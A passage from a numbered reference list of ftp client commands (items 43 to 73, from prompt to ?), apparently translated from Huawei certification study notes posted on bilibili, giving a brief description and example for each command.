43. prompt: Set up an interactive prompt for multiple file transfers.
44.proxy ftp-cmd: In the secondary control connection, executes an ftp command that allows connection to two ftp servers in order to transfer files between the two servers. The first ftp command must be open to first establish a connection between the two servers.
45. put local-file[remote-file]: transfer local-file to remote host.
46. pwd: Displays the current working directory of the remote host.
47. quit: same as bye, exit ftp session.
48. quote arg1, arg2…: send parameters verbatim to the remote ftp server, e.g.: quote syst.
49.recv remote-file[local-file] : same as get.
50. reget remote-file[local-file]: similar to get, but if local-file exists, it will be resumed from the last transmission break.
51. rhelp[cmd-name]: request help from the remote host.
52. rstatus[file-name]: displays the status of the remote host if no file name is specified, otherwise displays the file status.
53. rename[from][to]: Change the remote host file name.
54. reset: Clears the answer queue.
55. restart marker: restart get or put from the specified marker, e.g.: restart 130.
56. rmdir dir-name: Delete the remote host directory.
57. runique: Set the file name to be stored only uniquely, if the file exists, then add the suffix .1, .2, etc. to the original file.
58.send local-file[remote-file] : same as put.
59. sendport: Sets the use of the PORT command.
60.site arg1, arg2…: sends the arguments verbatim to the remote ftp host as a SITE command.
61.size file-name: Displays the size of the remote host file. such as: site idle 7200.
62. status: show current ftp status.
63. struct[struct-name]: set the file transfer structure to struct-name, by default the stream structure is used.
64. sunique: Set remote host filename storage to one only (corresponds to runique).
65. system: Displays the type of operating system of the remote host.
66. tenex: Sets the file transfer type to the desired type for the TENEX machine.
67. tick: Set the byte counter for transmission.
68. trace: Set up packet tracing.
69. type[type-name]: set the file transfer type to type-name, default is ascii, e.g. :type binary, set the binary transfer method.
70. umask[newmask]: set the default umask of the remote server to newmask, e.g.: umask 3
71. user user-name[password][account]: Identifies itself to the remote host and must be entered when a password is required, e.g. user anonymous my@email.
72. verbose: the same as the -v parameter on the command line, i.e., set the exhaustive reporting mode, all responses of the ftp server will be displayed to the user, the default is on.
73.? [cmd]: same as help. author: huawei certification preparation materials https://www.bilibili.com/read/cv15485855?spm_id_from=333.999.0.0 source: bilibili